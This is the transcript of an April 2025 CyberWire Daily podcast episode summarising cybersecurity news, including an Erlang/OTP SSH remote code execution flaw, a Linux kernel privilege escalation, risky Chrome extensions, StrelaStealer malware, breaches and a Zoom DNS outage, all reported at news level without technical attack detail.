Podcasts
CyberWire Daily
Ep 2290
The CyberWire Daily Podcast 4.18.25
Ep 2290 | 4.18.25

SSH-attered trust.

Show Notes
Transcript

A critical vulnerability in Erlang/OTP SSH allows unauthenticated remote code execution. There’s a bipartisan effort to renew a key cybersecurity info sharing law. A newly discovered Linux kernel vulnerability allows local attackers to escalate privileges. A researcher uncovers 57 risky Chrome extensions with a combined 6 million users. AttackIQ shares StrelaStealer simulations. A major live events service provider notifies employees and customers of a data breach. CISA warns of an actively exploited SonicWall vulnerability. An airport retailer agrees to a multi-million dollar settlement stemming from a ransomware attack. A preview of RSAC 2025 with Linda Gray Martin and Britta Glade. Zoom-a-zoom zoom, it’s always DNS.

Today is Friday April 19th 2025. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

A critical vulnerability in Erlang/OTP SSH allows unauthenticated remote code execution. 

Erlang/OTP SSH is widely used in systems that demand high availability and concurrency, particularly in telecommunications, IoT, and embedded devices. Its integration into Erlang’s ecosystem makes it a preferred choice for developers building distributed systems requiring secure remote access.

A critical vulnerability in Erlang/OTP SSH, tracked as CVE-2025-32433, allows unauthenticated remote code execution on affected devices. Discovered by researchers at Ruhr University Bochum, it carries a maximum CVSS score of 10.0. The flaw stems from improper handling of pre-authentication SSH messages, enabling attackers to run commands—often as root—via the SSH daemon. Horizon3’s security team confirmed the exploit is easy to reproduce and could soon see public proof-of-concepts. All systems using Erlang/OTP’s SSH are impacted. Erlang, relies on the OTP stack for components like SSH. Users are urged to upgrade to versions 25.3.2.10 or 26.2.4 immediately. For systems that can’t be patched, access should be limited to trusted IPs or SSH disabled altogether.

There’s a bipartisan effort to renew a key cybersecurity info sharing law. 

Senators Gary Peters (D-MI) and Mike Rounds (R-SD) have introduced the Cybersecurity Information Sharing Extension Act to renew a key 2015 law encouraging businesses to share cyberthreat data with the government. Set to expire in September, the original Cybersecurity Information Sharing Act helped companies report threats like malware and vulnerabilities to DHS while receiving legal protections. The law supports real-time collaboration between private firms and agencies like CISA through efforts like the Joint Cyber Defense Collaborative. It’s credited with aiding responses to major incidents like SolarWinds and Volt Typhoon. Rounds warned that letting it lapse would harm national cyber defenses. Experts agree the law has boosted operational partnerships but say the renewal is a chance to update it for modern privacy, supply chain, and threat realities.

A newly discovered Linux kernel vulnerability allows local attackers to escalate privileges. 

A newly discovered Linux kernel vulnerability, CVE-2024-53141, poses a serious risk by allowing local attackers to escalate privileges and potentially gain root access. With a CVSS score of 7.8, the flaw affects the bitmap:ip set type in the netfilter subsystem, due to improper handling of IP range parameters. Exploit code targets kernel versions 2.6.39 through 6.6.62, enabling attackers to perform out-of-bounds writes, bypass KASLR, and execute kernel-level code. Patches are available, and system administrators are urged to update immediately.

A researcher uncovers 57 risky Chrome extensions with a combined 6 million users. 

Security researcher John Tuckner has uncovered 57 risky Chrome extensions with a combined 6 million users, many of which have excessive permissions and could be used for surveillance or malicious activity. These extensions—often unlisted from the Chrome Web Store and only installable via direct link—claim to offer privacy or ad-blocking services but can monitor browsing behavior, access cookies, modify search results, and execute remote scripts. The most notable, Fire Shield Extension Protection, is heavily obfuscated and communicates with a suspicious domain, unknow.com. Tuckner found multiple extensions linked to the same domain, raising concerns about their potential use as spyware. Google is currently investigating the report, and users are advised to remove any of the flagged extensions and reset their passwords as a precaution. Some extensions have been taken down, but others remain active.

AttackIQ shares StrelaStealer simulations. 

StrelaStealer is a credential-stealing malware targeting email clients like Microsoft Outlook and Mozilla Thunderbird, active since 2022 and attributed to the threat actor HIVE-0145. It spreads via phishing emails containing ZIP files with malicious JavaScript that downloads a DLL payload. Recent campaigns have hit over 100 organizations across Europe and the U.S., with enhanced obfuscation and new delivery methods involving PowerShell and WebDAV. AttackIQ has released attack graphs that simulate StrelaStealer’s behavior—covering its initial infection, system discovery, and data exfiltration—to help organizations test and improve their defenses. These scenarios highlight the importance of monitoring native Windows utilities like Rundll32 and Regsvr32, which are used to launch the malware. Security teams are urged to use these tools to validate detection and mitigation strategies against this growing threat.

A major live events service provider notifies employees and customers of a data breach. 

Legends International, a major live events service provider, is notifying employees and customers of a data breach discovered on November 9, 2024. The company took systems offline and found that attackers exfiltrated files containing sensitive data, including Social Security numbers, driver’s license details, payment card info, and medical records. Over 8,000 Texans were affected, though the full scope remains unknown. While there’s no evidence of misuse, impacted individuals are being offered two years of free identity protection. No group has claimed responsibility.

CISA warns of an actively exploited SonicWall vulnerability. 

CISA has warned U.S. federal agencies to patch a high-severity remote code execution vulnerability, CVE-2021-20035, affecting SonicWall SMA 100 series appliances. The flaw allows low-privileged, remote attackers to execute arbitrary code via the SMA100 management interface. Initially considered a denial-of-service issue, SonicWall recently upgraded its severity and confirmed it is being actively exploited. Agencies must patch by May 7, and all organizations are urged to act swiftly to prevent potential breaches.

An airport retailer agrees to a multi-million dollar settlement stemming from a ransomware attack. 

Airport retailer Paradies Shops has agreed to a $6.9 million settlement to resolve a class-action lawsuit stemming from a 2020 ransomware attack that exposed personal data of 76,000 current and former employees. The breach, linked to the REvil ransomware group, compromised names and Social Security numbers after hackers accessed systems for five days. Plaintiffs accused the company of negligence and delayed notification. While denying wrongdoing, Paradies opted to settle to avoid prolonged litigation. The deal follows a growing trend of post-breach class actions.

 

Zoom-a-zoom zoom, it’s always DNS. 

And finally, our “it’s always DNS desk” reports that earlier this week, millions of people found themselves staring into the void—of a broken Zoom link. The beloved video call platform went dark for nearly two hours, not because of hackers or server meltdowns, but due to a digital game of telephone gone hilariously wrong. The culprit? A miscommunication between Zoom’s domain registrar, Markmonitor, and GoDaddy Registry, keeper of the .us domain. In short, GoDaddy accidentally hit the “off” switch on zoom.us, making it disappear from the internet.

While those already mid-meeting continued blissfully unaware, the rest of us were left refreshing error messages and briefly wondering if the apocalypse had begun. DNS cache delays meant the fix took a while to ripple across the web, and Zoom had to walk users through techy tasks like flushing their DNS (cue the Googling).

Zoom has since slapped a registry lock on its domain. Better late than never…

And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.

 

We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com

We’re privileged that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.

N2K makes it easy for companies to optimize your biggest investment, your people. We make you smarter about your teams, while making your teams smarter. Learn how at n2k.com.

 

N2K’s senior producer is Alice Carruth. Our CyberWire producer is Liz Stokes. We’re mixed by Tré Hester, with original music and sound design by Elliott Peltzman. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher, and I’m Dave Bittner. Thanks for listening.

CyberWire Daily
Podcast Info
HOST(S):
Dave Bittner
Dave Bittner is a security podcast host and one of the founders at CyberWire. He's a creator, producer, videographer, actor, experimenter, and entrepreneur. He's had a long career in the worlds of television, journalism and media production, and is one of the pioneers of non-linear editing and digital storytelling.
Schedule: Monday-Friday
Creator: CyberWire, Inc.